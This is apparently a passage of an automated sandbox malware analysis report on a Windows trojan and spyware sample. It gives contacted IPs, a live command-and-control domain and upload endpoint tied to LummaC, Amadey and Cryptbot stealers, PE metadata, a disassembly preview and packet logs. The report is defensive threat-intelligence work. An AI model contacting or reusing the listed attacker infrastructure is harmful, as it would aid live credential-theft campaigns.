                                  http://.jpg1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://home.twentytk20pn.top/WEfo1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.226.108.155
                                        		httpbin.orgUnited States
                                        		14618AMAZON-AESUSfalse
                                        147.45.113.159
                                        		home.twentytk20pn.topRussian Federation
                                        		2895FREE-NET-ASFREEnetEUfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1578916
                                        Start date and time:2024-12-20 16:36:55 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 59s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:2
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:1o81tDUu5M.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:3fbe557c7ec8409f30604b0f5e365f70.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:37:57API Interceptor3x Sleep call for process: 1o81tDUu5M.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        34.226.108.15516ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                              5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                      s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                        65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                          UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                            147.45.113.159file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • twentytk20pn.top/v1/upload.php
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • twentytk20pn.top/v1/upload.php
                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                            • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                            • twentytk20pn.top/v1/upload.php

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            httpbin.orgHZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            t6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 34.226.108.155
                                                            home.twentytk20pn.topfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                            • 147.45.113.159
                                                            SwJD3kiOwV.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 194.87.47.113
                                                            8dw8GAvqmM.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 194.87.47.113
                                                            UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                            • 194.87.47.113
                                                            L1SrJoDQvG.exeGet hashmaliciousUnknownBrowse
                                                            • 194.87.47.113
                                                            Ry6ot1YULB.exeGet hashmaliciousUnknownBrowse
                                                            • 194.87.47.113

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            FREE-NET-ASFREEnetEUCaptcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                            • 147.45.44.131
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                            • 147.45.179.98
                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                            • 147.45.113.159
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                            • 147.45.113.159
                                                            iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 147.45.47.15
                                                            script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 147.45.47.15
                                                            script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 147.45.47.15
                                                            AMAZON-AESUSnshmpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 52.206.106.77
                                                            DzbIZ1HRMj.zipGet hashmaliciousUnknownBrowse
                                                            • 52.0.145.89
                                                            16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            securedoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                            • 52.86.107.71
                                                            5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                            • 3.236.206.93
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 54.7.169.53
                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 18.214.183.17

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.984844015632634
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:1o81tDUu5M.exe
                                                            File size:4'456'448 bytes
                                                            MD5:3fbe557c7ec8409f30604b0f5e365f70
                                                            SHA1:00d9f4548c93be387f68c1b7aeedcf4c75873b60
                                                            SHA256:f4e7b423983d4606cb9a72876f57c870884b40556ab6ea3da498d69e02acacab
                                                            SHA512:802d3925592429a116f24c5a35723f030ea6fc4924dc201eb69a09bfeda57aac3e0c2246d0e213d131b888515936c31d13c03fd6c32c2d091a3ddc2437c1642d
                                                            SSDEEP:98304:Lcv0DvP7v4m0C6OkeSEj18aRZTZgE5CT+zM:/vjgmj36Ej931guCT
                                                            TLSH:C62633DD9D67785DFCFD94BD0A86426931B0B6B796BDCBA080230AB848DF15A30910FD
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@.......................... ........D...@... ............................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0xf5f000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                            DLL Characteristics:DYNAMIC_BASE
                                                            Time Stamp:0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007FE8008CE47Ah
                                                            pmaxub mm0, qword ptr [ebx+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007FE8008D0475h
                                                            add byte ptr [edi], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, 00h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax*4], cl
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x61905f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6180000x2b0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb5d2ec0x10obbejfdq
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xb5d29c0x18obbejfdq
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x6170000x283e00138ecb49ecd53a6c6d3b1a5f824bf440unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6180000x2b00x200fde9f1a5508e52b0ee75d954523870abFalse0.796875data5.956232138306263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x6190000x10000x200e8fbf92e0939d0cd4935f0fe539e974dFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x61a0000x38b0000x2009ea5ee5b429edd47a3882ac1d99ee14funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            obbejfdq0x9a50000x1b90000x1b8600a39260f0b17a1968282f76e4b3a15d43False0.9943257921160943data7.954225116292913IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            msdghfca0xb5e0000x10000x400d06fae7119fd628f6285c25f86cd7312False0.7958984375data6.164160131862484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xb5f0000x30000x22005f10ea9826adc53c7b54bfc9ca3ff017False0.06318933823529412DOS executable (COM)0.7657283604344686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xb5d2fc0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:37:52.531341076 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:52.531456947 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:52.531569004 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:52.542860985 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:52.542898893 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.394315004 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.394821882 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.394855022 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.396599054 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.396652937 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.398673058 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.398776054 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.410425901 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.410434008 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.459146976 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.752221107 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.752300024 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:54.752480984 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.762233019 CET49730443192.168.2.434.226.108.155
                                                            Dec 20, 2024 16:37:54.762309074 CET4434973034.226.108.155192.168.2.4
                                                            Dec 20, 2024 16:37:55.907154083 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.029737949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.032578945 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.033643961 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.155607939 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155623913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155635118 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155644894 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155654907 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155664921 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155673981 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.155675888 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155684948 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155695915 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155706882 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.155708075 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.155778885 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.275799036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.275829077 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.275862932 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.275897980 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.275923014 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.275933027 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.275959015 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.275979996 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.276210070 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.276221037 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.276248932 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.276263952 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.323061943 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.323246956 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.442934036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.443054914 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.491123915 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.491204023 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.603213072 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.699069023 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.699198008 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:56.943008900 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:56.943178892 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.106323957 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.106601954 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.106664896 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226526976 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226618052 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226629972 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226643085 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226680994 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226701975 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226712942 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226788044 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226871014 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226907015 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.226963997 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.226975918 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227113008 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227159023 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227161884 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227221966 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227348089 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227358103 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227432966 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227447033 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227463961 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227489948 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227516890 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227714062 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227758884 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.227886915 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.227957964 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.228058100 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228097916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.228238106 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228494883 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228506088 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228606939 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228763103 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229007006 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229017973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229032993 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229325056 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229332924 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229343891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229396105 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229418039 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229460955 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229605913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229615927 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229645014 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229674101 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229748011 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229793072 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229937077 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229945898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.230000019 CET4973180192.168.2.4147.45.113.159
